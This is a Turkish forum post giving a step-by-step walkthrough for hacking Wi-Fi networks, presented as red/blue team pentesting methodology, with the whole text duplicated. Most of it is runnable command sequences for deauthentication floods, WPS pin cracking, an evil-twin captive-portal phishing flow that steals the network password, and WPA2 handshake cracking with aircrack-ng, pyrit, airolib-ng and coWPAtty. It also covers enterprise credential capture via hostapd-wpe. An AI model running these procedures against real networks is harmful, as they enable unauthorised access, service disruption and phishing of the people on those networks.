Diyarbakırlı Babo
- 22 Mar 2020
- 284 Mesaj
Aktiflik
Seviye
Deneyim
Merhaba arkadaşlar,
Bu yazıda sizlere bir kablosuz ağın hacklenmesi amacı ile genellikle izlediğim yolu izah edeceğim. Bütün testlerimde profosyenel olarak bu adımları her zaman uygularım. Bu nedenle tüm süreçleri maddeler halinde detaylandırdım. Daha fazla bilgileri konuya iişkin alanda, yorumlarda paylaşmaya gayret edeceğim. Ek olarak diğer konularımıda inceleyebilirsiniz, bir çok açıklama ve ilişkili konular mevcuttur.Aynı zamanda, sorularınızı özgürce sorabilirsiniz, seve seve yanıtlayacağım.
NOT: Tüm süreçler Blue ve Red Team çalışmaları göz önüne alınarak oluşturulmuştur. İki taraf içinde faydalı bilgiler bulunmaktadır.
İşletim Sistemleri
+ KALi
+ WifiSlax: WiFi testleri için geliştirilmiş ispanyolca bir sanal makine.
Kullanılabilir Araçlar
+ Linset: wifislax işletim sistemi içerisinde bulunan bir otomatize araç
+ fluxion2: Kali işletim sistemi üzerine kurulabilecek otomatize bir araç(Türkçe desteği var)
+ wifi-phisher:
+ aircrack-ng paketi
+ reaver aracı
Kullanılabilecek Donanımlar
+ WiFi Pineapple: Kablosuz ağ testleri için özelleştirilmiş bir donanım ve yazılım bütünüdür. Hem saldırı hem savunma tarafında bulunan kişiler tarafından kullanılabilir.
+ Alfa Card: Kablosuz ağ testlerinde sahte erişim noktası açmak ve saldırı düzenlemek amacı ile tasarlanmış bir donanımdır.
+ TP LINK TL-WN722N: Kablosuz ağ testlerinde sahte erişim noktası açmak ve saldırı düzenlemek amacı ile tasarlanmış bir donanımdır.
+ Panda Wireless PAU09 N600 Dual Band (2.4GHz and 5GHz) (Önerimdir!!!)
Kablosuz Ağ Testlerinde Yapılacak Kontroller
1. Cihazın Denetlenmesi: Bu kontrolün amacı, direkt cihaza yönelik zafiyetlerin değerlendirilmesidir.
2. Çevresel Tehditlerin Analizi: Bu kontrolün amacı, kurum için çevrede olan veya olabilecek tehditlerin gözlemlenmesidir.
3. Kullanıcı Davranışlarının Denetlenmesi: Bu kontrolün amacı, kurum ağına bağlı istemcilerin, sahte erişim noktalarına karşı tepkilerinin ölçülmesidir.
4. Parola Elde Etme: Bu kontrolün amacı, kaba kuvvet yöntemiyle veya oltalama yöntemi ile parola bilgisinin elde edilmesine dayanır.
Cihazların Denetlenmesi:
+ Deauth(broadcast) ataklarına karşı dayanıklık testinin gerçekleştirilmesi.
Komut: aireplay-ng --deauth 30 -a hedef_mac_adresi monitor_mode_interface
+ WPS özelliğinin denetlenmesi: Bu aşamada WPS pin cracking işlemi testi gerçekleştirilir.
+ Bu donanıma ait exploitlerin araştırılması: Bu adımda exploit-db üzerinden arama yapabilirsiniz, versiyon ve üretici bilgisine göre.
Komut: airodump-ng --bssid hedef_mac_adresi -c hedef_kanal_numarası --manufacturer monitor_mode_interface
Komut: Üretici bilgisi tespit edilir ve google da araştırma yapılır.
Çevresel Tehditlerin Analizi:
+ Etraftaki açık(open) ağların tespiti
Komut: airodump-ng --enrypt OPN monitor_mode_interface -w kayıt_edilecek_dosya (1.yöntem)
Komut: python openbul.py monitor_mode_interface (2.yöntem)
+ Etraftaki gizli ağların tespiti
Komut: python gizlibul.py monitor_mode_interface
+ Benzer SSID lerin tespit edilmesi çok büyük önem arz etmektedir.
Komut: airodump-ng --essid-regex kurumismi_regex_ifade monitor_mode_interface -w kayıt_edilecek_dosya (1.yöntem)
Komut: python benzerssibul.py -k kurum_ismi monitor_mode_interface (2.yöntem)
+ Deauth paketlerinin yoğunluğunun ölçülmesi (direkt ve broadcast)
Komut: python deauthanaliz.py monitor_mode_interface
+ Kanal dağılımlarının incelenmesi
Komut: python kanalanaliz.py monitor_mode_interface
+ Pineapple kullanımının tespiti.
Komut: python pineapplebul.py monitor_mode_interface
Kullanıcı Davranışların Denetlenmesi:
+ Kurum tarafından verilen hedef ağa bağlı kullanıcıların daha önce bağlandığı erişim noktalarının tespit edilerek bu bilgilerle sahte erişim noktalarıının açılması.
+ Fazla sayıda parola korumasız ağların açılması
+ İlgi çekici kelimelerle parola korumasız ağların oluşturulması
Parola Elde Etme:
+ Phishing Yolu ile Parola Elde Edilmesi
--- linset aracı ile:
# ilk olarak wifislax işletim sistemi başlatılır.
# Daha sonra sistem açıldığında terminal açılır ve terminale "linset" yazılır.
# linset aracı gereklilikleri kontrol eder. Eğer hepsi "OK" sonucu döndürüyorsa işleme devam edebilirsiniz.
# Daha sonra sisteme takılı ağ kartlarını tespit eder ve hangisi ile işlem yapmak istediğinizi sorar. Seçim yapıp ilerliyorsunuz.
# Burada size tüm kanllar üzerinde mi yoksa özel bir kanalda yayın yapan cihazları mı aramak istediğinizi sorar, genelde 1 numaralı seçenek ile tüm kanalları tarmasını sağlarız ve devam ederiz.
# Tarama işlemini sonlandırmak istediğinizde CTRL + C tuşlarına basarsınız ve hedefinizin numarasını seçersiniz.
# Bu işlemden sonra hedef ağ hakkında size bir özet sunar ve sahte erişim noktası oluşturuken kullanmak istediğiniz aracı sorar. Bu noktada hostapd önerilir.
# Handshake yakalandığında kayıt edilecek yeri sorar.Direkt enter tuşuna basıp geçebilirsiniz.
# Handshake değerini kırmak için hangi yazılımı kullanmak istediğinizi sorar.
# Şimdi de 1 numaralı seçeneği seçerek hedef erişim notasına bir deuath atak başlatırız. Bu işlem handshake yakalamk için uygulanır.
# Handshake yakalandıktan sonra ana ekrandan handshake değerini kontrol ederiz ve diğer adıma geçer.
# Bu adımda da sahte erişim noktası başlatılır ve gerçek ağa periyodik olarak deauth saldırısı olur.
# Hedef istemcilerden biri sahte erişim noktasına bağlandığında ve bir web sitesine gitmek istediğinde fakedns sayesinde wireless phishing sayfasına yönlendirir ve kablosuz ağ parolasını ister.
# Hedef kullanıcı parola bilgisini girince bu bilgi handshake ile kontrol edilir, eğer doğru iste parolanın kırıldığı bilgisi önümüze düşer ve sistem otomatik kapanır. Aynı zamanda bu süreç loglanır.
# Eğer bilgi doğru değilse sistem çalışmaya devam eder.
+ Handshake değerinin kırılması yolu ile
--- WPA2 - Sözlük saldırısı ile handshake değerinin kırılması:
# airmon-ng start wlan0
# airodump-ng –c lt;AP_Channel gt; --bssid -w wlan0mon
# aireplay-ng -0 1 –a -c wlan0mon
# aircrack-ng –w -b Handshaked_PCAP
--- WPA2 - Pyrit ile Saldırı Düzenlemek:
# airmon-ng start wlan0
# airodump-ng –c --bssid -w wlan0mon
# aireplay-ng -0 1 –a -c wlan0mon
# pyrit –r pcap_file_name -b -i attack_passthrough
# pyrit –i import_passwords
# pyrit –e create_essid
# pyrit batch
# pyrit –r PCAP_of_FileName attack_db
--- WPA2 - Airolib ile Saldırı Düzenlemek:
# airmon-ng start wlan0
# airodump-ng –c AP_Channel --bssid -w wlan0mon
# aireplay-ng -0 1 –a -c wlan0mon
# airolib-ng korsan --import essid ESSID.txt
-- Hedef ağın SSID bilgisi veritabanına dahil edilir.
# airolib-ng korsan --import passwd
-- Elimizdeki parola listesi veritabanına dahil edilir.
# airolib-ng korsan --clean all
-- Eğer parola listemizde tekrarlayan değerler varsa temizlenecektir
# airolib-ng korsan --stats
-- Veritabanı hakkında bilgi verir.
# airolib-ng korsan --batch
-- PMK değerleri üretilir
# airolib-ng korsan --verify all
-- Hatalı PMK değelerinin silinmesi için kullanılır.
# aircrack-ng –r korsan Handshaked_PCAP
--- WPA2 - coWPAtty - PMK değerleriyle - HIZLI (Ancak önceden PMK değerleri hesaplanmalı)
# airmon-ng start wlan0
-- Ağ kartı monitor moda alınır
# airodump-ng -c kanal_numarasi --bssid hedef_mac_adresi -w kayıt_edilecek_dosya monitor_mode_interface
-- Hedef özel olarak izlemeye alınır ve paketler kayıt altına alınır.
# aireplay-ng -0 1 -a hedef_mac_adresi -c hedef_istemci_mac_Adresi monitor_mode_interface
-- DoS saldırısı düzenlenerek WPA Handshake yakalanmaya çalışılır.
# genpmk –s SSID-kablosuz_ağ_ismi –f parola_listesi -d hash_dosya_ismi_pmk
# cowpatty –r handshake_kayıt_edilen_dosya -d hash_dosya_ismi_pmk –s SSID-kablosuz_ağ_ismi
+ Wifmapteki public değerlerin sorgulanması kuruma özel
# WiFi Map uygulamasından elde edilen değerlerde kurum ssid, bssid ve parola bilgileri sorgulanır.
+ Kurumsal Ağ Hacklenecekse, hostapd-wpe ile sahte erişim noktası yaratılır ve JTR veya asleap aracı ile kaba kuvvet saldırısı uygulanır.
Bu yazıda sizlere bir kablosuz ağın hacklenmesi amacı ile genellikle izlediğim yolu izah edeceğim. Bütün testlerimde profosyenel olarak bu adımları her zaman uygularım. Bu nedenle tüm süreçleri maddeler halinde detaylandırdım. Daha fazla bilgileri konuya iişkin alanda, yorumlarda paylaşmaya gayret edeceğim. Ek olarak diğer konularımıda inceleyebilirsiniz, bir çok açıklama ve ilişkili konular mevcuttur.Aynı zamanda, sorularınızı özgürce sorabilirsiniz, seve seve yanıtlayacağım.
NOT: Tüm süreçler Blue ve Red Team çalışmaları göz önüne alınarak oluşturulmuştur. İki taraf içinde faydalı bilgiler bulunmaktadır.
İşletim Sistemleri
+ KALi
+ WifiSlax: WiFi testleri için geliştirilmiş ispanyolca bir sanal makine.
Kullanılabilir Araçlar
+ Linset: wifislax işletim sistemi içerisinde bulunan bir otomatize araç
+ fluxion2: Kali işletim sistemi üzerine kurulabilecek otomatize bir araç(Türkçe desteği var)
+ wifi-phisher:
+ aircrack-ng paketi
+ reaver aracı
Kullanılabilecek Donanımlar
+ WiFi Pineapple: Kablosuz ağ testleri için özelleştirilmiş bir donanım ve yazılım bütünüdür. Hem saldırı hem savunma tarafında bulunan kişiler tarafından kullanılabilir.
+ Alfa Card: Kablosuz ağ testlerinde sahte erişim noktası açmak ve saldırı düzenlemek amacı ile tasarlanmış bir donanımdır.
+ TP LINK TL-WN722N: Kablosuz ağ testlerinde sahte erişim noktası açmak ve saldırı düzenlemek amacı ile tasarlanmış bir donanımdır.
+ Panda Wireless PAU09 N600 Dual Band (2.4GHz and 5GHz) (Önerimdir!!!)
Kablosuz Ağ Testlerinde Yapılacak Kontroller
1. Cihazın Denetlenmesi: Bu kontrolün amacı, direkt cihaza yönelik zafiyetlerin değerlendirilmesidir.
2. Çevresel Tehditlerin Analizi: Bu kontrolün amacı, kurum için çevrede olan veya olabilecek tehditlerin gözlemlenmesidir.
3. Kullanıcı Davranışlarının Denetlenmesi: Bu kontrolün amacı, kurum ağına bağlı istemcilerin, sahte erişim noktalarına karşı tepkilerinin ölçülmesidir.
4. Parola Elde Etme: Bu kontrolün amacı, kaba kuvvet yöntemiyle veya oltalama yöntemi ile parola bilgisinin elde edilmesine dayanır.
Cihazların Denetlenmesi:
+ Deauth(broadcast) ataklarına karşı dayanıklık testinin gerçekleştirilmesi.
Komut: aireplay-ng --deauth 30 -a hedef_mac_adresi monitor_mode_interface
+ WPS özelliğinin denetlenmesi: Bu aşamada WPS pin cracking işlemi testi gerçekleştirilir.
+ Bu donanıma ait exploitlerin araştırılması: Bu adımda exploit-db üzerinden arama yapabilirsiniz, versiyon ve üretici bilgisine göre.
Komut: airodump-ng --bssid hedef_mac_adresi -c hedef_kanal_numarası --manufacturer monitor_mode_interface
Komut: Üretici bilgisi tespit edilir ve google da araştırma yapılır.
Çevresel Tehditlerin Analizi:
+ Etraftaki açık(open) ağların tespiti
Komut: airodump-ng --enrypt OPN monitor_mode_interface -w kayıt_edilecek_dosya (1.yöntem)
Komut: python openbul.py monitor_mode_interface (2.yöntem)
+ Etraftaki gizli ağların tespiti
Komut: python gizlibul.py monitor_mode_interface
+ Benzer SSID lerin tespit edilmesi çok büyük önem arz etmektedir.
Komut: airodump-ng --essid-regex kurumismi_regex_ifade monitor_mode_interface -w kayıt_edilecek_dosya (1.yöntem)
Komut: python benzerssibul.py -k kurum_ismi monitor_mode_interface (2.yöntem)
+ Deauth paketlerinin yoğunluğunun ölçülmesi (direkt ve broadcast)
Komut: python deauthanaliz.py monitor_mode_interface
+ Kanal dağılımlarının incelenmesi
Komut: python kanalanaliz.py monitor_mode_interface
+ Pineapple kullanımının tespiti.
Komut: python pineapplebul.py monitor_mode_interface
Kullanıcı Davranışların Denetlenmesi:
+ Kurum tarafından verilen hedef ağa bağlı kullanıcıların daha önce bağlandığı erişim noktalarının tespit edilerek bu bilgilerle sahte erişim noktalarıının açılması.
+ Fazla sayıda parola korumasız ağların açılması
+ İlgi çekici kelimelerle parola korumasız ağların oluşturulması
Parola Elde Etme:
+ Phishing Yolu ile Parola Elde Edilmesi
--- linset aracı ile:
# ilk olarak wifislax işletim sistemi başlatılır.
# Daha sonra sistem açıldığında terminal açılır ve terminale "linset" yazılır.
# linset aracı gereklilikleri kontrol eder. Eğer hepsi "OK" sonucu döndürüyorsa işleme devam edebilirsiniz.
# Daha sonra sisteme takılı ağ kartlarını tespit eder ve hangisi ile işlem yapmak istediğinizi sorar. Seçim yapıp ilerliyorsunuz.
# Burada size tüm kanllar üzerinde mi yoksa özel bir kanalda yayın yapan cihazları mı aramak istediğinizi sorar, genelde 1 numaralı seçenek ile tüm kanalları tarmasını sağlarız ve devam ederiz.
# Tarama işlemini sonlandırmak istediğinizde CTRL + C tuşlarına basarsınız ve hedefinizin numarasını seçersiniz.
# Bu işlemden sonra hedef ağ hakkında size bir özet sunar ve sahte erişim noktası oluşturuken kullanmak istediğiniz aracı sorar. Bu noktada hostapd önerilir.
# Handshake yakalandığında kayıt edilecek yeri sorar.Direkt enter tuşuna basıp geçebilirsiniz.
# Handshake değerini kırmak için hangi yazılımı kullanmak istediğinizi sorar.
# Şimdi de 1 numaralı seçeneği seçerek hedef erişim notasına bir deuath atak başlatırız. Bu işlem handshake yakalamk için uygulanır.
# Handshake yakalandıktan sonra ana ekrandan handshake değerini kontrol ederiz ve diğer adıma geçer.
# Bu adımda da sahte erişim noktası başlatılır ve gerçek ağa periyodik olarak deauth saldırısı olur.
# Hedef istemcilerden biri sahte erişim noktasına bağlandığında ve bir web sitesine gitmek istediğinde fakedns sayesinde wireless phishing sayfasına yönlendirir ve kablosuz ağ parolasını ister.
# Hedef kullanıcı parola bilgisini girince bu bilgi handshake ile kontrol edilir, eğer doğru iste parolanın kırıldığı bilgisi önümüze düşer ve sistem otomatik kapanır. Aynı zamanda bu süreç loglanır.
# Eğer bilgi doğru değilse sistem çalışmaya devam eder.
+ Handshake değerinin kırılması yolu ile
--- WPA2 - Sözlük saldırısı ile handshake değerinin kırılması:
# airmon-ng start wlan0
# airodump-ng –c lt;AP_Channel gt; --bssid -w wlan0mon
# aireplay-ng -0 1 –a -c wlan0mon
# aircrack-ng –w -b Handshaked_PCAP
--- WPA2 - Pyrit ile Saldırı Düzenlemek:
# airmon-ng start wlan0
# airodump-ng –c --bssid -w wlan0mon
# aireplay-ng -0 1 –a -c wlan0mon
# pyrit –r pcap_file_name -b -i attack_passthrough
# pyrit –i import_passwords
# pyrit –e create_essid
# pyrit batch
# pyrit –r PCAP_of_FileName attack_db
--- WPA2 - Airolib ile Saldırı Düzenlemek:
# airmon-ng start wlan0
# airodump-ng –c AP_Channel --bssid -w wlan0mon
# aireplay-ng -0 1 –a -c wlan0mon
# airolib-ng korsan --import essid ESSID.txt
-- Hedef ağın SSID bilgisi veritabanına dahil edilir.
# airolib-ng korsan --import passwd
-- Elimizdeki parola listesi veritabanına dahil edilir.
# airolib-ng korsan --clean all
-- Eğer parola listemizde tekrarlayan değerler varsa temizlenecektir
# airolib-ng korsan --stats
-- Veritabanı hakkında bilgi verir.
# airolib-ng korsan --batch
-- PMK değerleri üretilir
# airolib-ng korsan --verify all
-- Hatalı PMK değelerinin silinmesi için kullanılır.
# aircrack-ng –r korsan Handshaked_PCAP
--- WPA2 - coWPAtty - PMK değerleriyle - HIZLI (Ancak önceden PMK değerleri hesaplanmalı)
# airmon-ng start wlan0
-- Ağ kartı monitor moda alınır
# airodump-ng -c kanal_numarasi --bssid hedef_mac_adresi -w kayıt_edilecek_dosya monitor_mode_interface
-- Hedef özel olarak izlemeye alınır ve paketler kayıt altına alınır.
# aireplay-ng -0 1 -a hedef_mac_adresi -c hedef_istemci_mac_Adresi monitor_mode_interface
-- DoS saldırısı düzenlenerek WPA Handshake yakalanmaya çalışılır.
# genpmk –s SSID-kablosuz_ağ_ismi –f parola_listesi -d hash_dosya_ismi_pmk
# cowpatty –r handshake_kayıt_edilen_dosya -d hash_dosya_ismi_pmk –s SSID-kablosuz_ağ_ismi
+ Wifmapteki public değerlerin sorgulanması kuruma özel
# WiFi Map uygulamasından elde edilen değerlerde kurum ssid, bssid ve parola bilgileri sorgulanır.
+ Kurumsal Ağ Hacklenecekse, hostapd-wpe ile sahte erişim noktası yaratılır ve JTR veya asleap aracı ile kaba kuvvet saldırısı uygulanır.

